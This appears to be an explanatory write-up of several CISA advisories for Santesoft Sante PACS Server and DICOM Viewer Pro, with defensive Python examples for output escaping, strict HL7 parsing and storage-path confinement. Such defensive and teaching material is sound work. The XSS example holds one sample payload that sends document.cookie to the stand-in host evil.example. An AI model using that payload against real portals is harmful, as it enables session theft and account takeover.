CVE-2025-54862 affects the web portal of Santesoft Sante PACS Server and is described by CISA as a stored cross-site scripting (XSS) vulnerability. According to the advisory, an attacker can inject malicious HTML that the portal stores and later renders to other users; the injected content can redirect a user to an attacker-controlled webpage and steal the user's cookie. CISA published the advisory on 2025-08-12, and the vendor remediation is to update to Sante PACS Server version 4.2.3 or later.
CVE-2025-54759 is a second stored cross-site scripting vulnerability in Santesoft Sante PACS Server, with the same impact: CISA's advisory says a malicious actor could inject HTML that redirects a user to a harmful webpage and may steal the user's cookie. Santesoft's remediation is again to update PACS Server to version 4.2.3 or later.
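Both stored XSS entries describe one failure pattern: text a user can save in the portal is later written into a page for other users without escaping. The following is an added Python example, not code from the page, from CISA, or from Santesoft (nothing about the portal's actual implementation is known), that contrasts the vulnerable rendering with output-escaped rendering and shows the HttpOnly cookie attribute that stops an injected script from reading the session cookie through document.cookie. The comment text, the page template and the cookie name are constructed for the example.

```python
import html

# Constructed sample: a free-text field that one authenticated portal user can save
# and that other users later view. The payload is a generic illustration of the
# "redirect and exfiltrate document.cookie" behaviour the advisories describe.
STORED_COMMENT = "<script>location='http://evil.example/?c='+document.cookie</script>"

# Constructed page template; {note} is where the stored text is placed.
PAGE_TEMPLATE = '<html><body><h1>Study notes</h1><div class="note">{note}</div></body></html>'


def render_unsafe(note: str) -> str:
    """Vulnerable pattern: stored, untrusted text is concatenated straight into HTML,
    so any markup it contains is interpreted by the viewer's browser."""
    return PAGE_TEMPLATE.format(note=note)


def render_safe(note: str) -> str:
    """Hardened pattern: escape on output, so <, >, &, and quotes reach the browser
    as character references and the text is displayed rather than executed."""
    return PAGE_TEMPLATE.format(note=html.escape(note, quote=True))


def contains_markup(rendered: str, fragment: str) -> bool:
    """Check whether a raw (unescaped) fragment survived into the rendered page."""
    return fragment in rendered


def session_cookie_header(name: str, value: str) -> str:
    """Defence in depth for the cookie-theft outcome: HttpOnly hides the cookie from
    script, Secure keeps it off cleartext connections, SameSite limits cross-site use."""
    return f"{name}={value}; Path=/; HttpOnly; Secure; SameSite=Strict"
```

Escaping on output is the actual fix; the cookie attributes are defence in depth, because a script that does run can still act as the logged-in user inside the page even when it cannot read the cookie value.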
CVE-2025-54156 affects Santesoft Sante PACS Server and is documented by CISA as the Web Portal transmitting credential information without encryption, which means anyone positioned on the network path between a user and the portal can capture the credentials. The advisory rates the issue HIGH (CVSS 7.4) and recommends updating to version 4.2.3 or later. Organizations using the portal should treat this as a credential-exposure problem that needs prompt remediation; until the update is applied, the usual compensating controls are to keep the portal off untrusted networks and, where the deployment allows it, terminate TLS in front of it.
CVE-2025-53948 is a high-severity denial-of-service vulnerability in Santesoft Sante PACS Server. According to the CISA advisory published on 2025-08-12, a remote attacker can send a crafted HL7 message that crashes the application's main thread, and the service does not recover on its own: it requires a manual restart. No authentication is needed, so any host that can reach the HL7 listener can take the archive offline until an operator intervenes; the listener should therefore be reachable only from the integration engine or other systems that legitimately send HL7. Santesoft's recommended mitigation is to update PACS Server to version 4.2.3 or later.
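CISA gives no detail of the crafted message, and this example does not try to reproduce it. It is an added Python illustration, not Santesoft's code and not from the advisory, of the defensive pattern the finding points at: an HL7 v2 receiver that validates MLLP framing and the MSH header strictly, turns every parse failure into an application-error (AE) acknowledgement, and never lets an exception escape to the thread that accepts connections. The ADT^A01 message, the malformed frames and the facility names are constructed for the example.

```python
from datetime import datetime, timezone
from typing import Optional

SB, EB, CR = b"\x0b", b"\x1c", b"\x0d"   # MLLP start block, end block, carriage return
MAX_FRAME = 1 << 20                       # refuse oversized frames before any parsing


class Hl7Error(ValueError):
    """Any framing or structural problem in an inbound message."""


def parse_msh(frame: bytes) -> dict:
    """Strictly parse the MLLP frame and the MSH segment; raise Hl7Error on anything odd."""
    if len(frame) > MAX_FRAME:
        raise Hl7Error("frame too large")
    if not (frame.startswith(SB) and frame.endswith(EB + CR)):
        raise Hl7Error("bad MLLP framing")
    try:
        text = frame[1:-2].decode("ascii")
    except UnicodeDecodeError as exc:
        raise Hl7Error("non-ASCII payload") from exc
    msh = text.split("\r")[0]
    if not msh.startswith("MSH") or len(msh) < 8:
        raise Hl7Error("first segment is not a usable MSH")
    sep = msh[3]                                  # MSH-1, the field separator
    fields = msh.split(sep)
    # fields[1] is MSH-2 (encoding characters); MSH-12 (version) is fields[11]
    if len(fields) < 12 or len(fields[1]) != 4:
        raise Hl7Error("MSH missing required fields")
    if not fields[9]:
        raise Hl7Error("empty MSH-10 control id")
    return {
        "sending_app": fields[2], "sending_fac": fields[3],
        "receiving_app": fields[4], "receiving_fac": fields[5],
        "msg_type": fields[8], "control_id": fields[9], "version": fields[11],
    }


def build_ack(hdr: Optional[dict], code: str, text: str = "") -> bytes:
    """Build an ACK (AA) or application-error NAK (AE) frame. Must never raise."""
    ts = datetime.now(timezone.utc).strftime("%Y%m%d%H%M%S")
    if hdr is None:   # nothing trustworthy was parsed: answer with our own identity only
        hdr = {"sending_app": "", "sending_fac": "", "receiving_app": "PACS",
               "receiving_fac": "PACS", "control_id": "", "version": "2.5"}
    msh = "|".join(["MSH", "^~\\&", hdr["receiving_app"], hdr["receiving_fac"],
                    hdr["sending_app"], hdr["sending_fac"], ts, "", "ACK",
                    "ACK" + ts, "P", hdr["version"]])
    msa = "|".join(["MSA", code, hdr["control_id"], text])
    return SB + (msh + "\r" + msa + "\r").encode("ascii") + EB + CR


def handle_frame(frame: bytes) -> bytes:
    """Called once per message by the listener. Parse failures become an AE NAK
    instead of an unhandled exception that would take the whole service down."""
    try:
        hdr = parse_msh(frame)
        # application processing (store order, update worklist, ...) would go here
        return build_ack(hdr, "AA")
    except Hl7Error as exc:
        return build_ack(None, "AE", str(exc))
    except Exception as exc:   # a bug in later processing must not kill the listener
        return build_ack(None, "AE", "internal error: " + type(exc).__name__)


# Constructed samples: one valid ADT^A01, one truncated header, one unframed blob.
SAMPLE_ADT = SB + (
    "MSH|^~\\&|HIS|HOSP|PACS|RAD|20250812101500||ADT^A01|MSG0001|P|2.5\r"
    "PID|1||123456^^^HOSP^MR||DOE^JANE\r"
).encode("ascii") + EB + CR
TRUNCATED = SB + b"MSH|^~\\&|" + EB + CR
GARBAGE = b"\xff\xfe" * 16
```

In a real service each connection runs on its own thread or task, handle_frame is the only thing that touches inbound bytes, and a supervisor restarts the process if the accept loop itself ever dies; the advisory's "manual restart" wording is exactly the absence of that last property.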
CVE-2025-0572 is an arbitrary file creation vulnerability in the web portal of Santesoft Sante PACS Server that is reachable over the network. CISA's advisory says remote attackers can use crafted DCM (DICOM) files to create arbitrary files on affected installations. The supplied CVSS v3.1 vector indicates low attack complexity, no user interaction and low privileges required, with an integrity impact only; the practical concern is that a file written to an attacker-chosen location on a server is frequently the first step toward further compromise. Santesoft's remediation is to update to Sante PACS Server 4.2.3 or later.
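The advisory does not say how content from the DCM file ends up shaping a filesystem path, so the following is an added Python example, not Santesoft's code and not drawn from the advisory, of the general control that prevents this class of bug: derive the storage path for a received DICOM object from validated UIDs only, and confine the resolved path to the archive root as an independent second check. The storage root and UIDs are constructed, and the choice to key storage on Study and SOP Instance UIDs is an illustrative assumption, not a description of the product.

```python
import re
from pathlib import Path

# A DICOM UID is a dot-separated run of digit groups, at most 64 characters long.
UID_RE = re.compile(r"[0-9]+(?:\.[0-9]+)*")
MAX_UID_LEN = 64


class UnsafeObjectPath(ValueError):
    """The requested storage location is not a valid, confined archive path."""


def is_valid_uid(uid) -> bool:
    """Accept only syntactically valid UIDs; slashes, '..', file extensions and
    over-long strings are rejected before they can influence a path."""
    return (isinstance(uid, str) and 0 < len(uid) <= MAX_UID_LEN
            and UID_RE.fullmatch(uid) is not None)


def confine(root: Path, relative: str) -> Path:
    """Resolve root/relative and refuse it unless it stays strictly inside root.
    This catches '..', absolute paths and symlinked directories regardless of
    how the relative name was built."""
    if "\x00" in relative:
        raise UnsafeObjectPath("NUL byte in path component")
    root = root.resolve()
    target = (root / relative).resolve()
    if root not in target.parents:
        raise UnsafeObjectPath(f"{relative!r} resolves outside {root}")
    return target


def is_confined(root: str, relative: str) -> bool:
    """Boolean form of confine() for checks and tests."""
    try:
        confine(Path(root), relative)
        return True
    except UnsafeObjectPath:
        return False


def object_path(storage_root: str, study_uid: str, sop_instance_uid: str) -> Path:
    """Derive where a received object is stored from its UIDs only. Any file name
    or path the sender supplies is never used; the UIDs are validated, then the
    composed path is confined as a second, independent check."""
    for uid in (study_uid, sop_instance_uid):
        if not is_valid_uid(uid):
            raise UnsafeObjectPath(f"not a valid DICOM UID: {uid!r}")
    return confine(Path(storage_root), f"{study_uid}/{sop_instance_uid}.dcm")
```

The two checks are deliberately redundant: the allow-list on the UID is what makes traversal impossible by construction, and the resolve-and-compare step is the safety net for any code path that builds a name some other way.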
CVE-2025-5307 affects Santesoft Sante DICOM Viewer Pro and is described by CISA as a memory corruption vulnerability. The advisory says a local attacker could potentially disclose information and execute arbitrary code on affected installations; a local attack vector generally means the attacker has to get malicious input processed by the viewer on the victim's machine rather than reach it over the network. Santesoft recommends upgrading to version 14.2.2.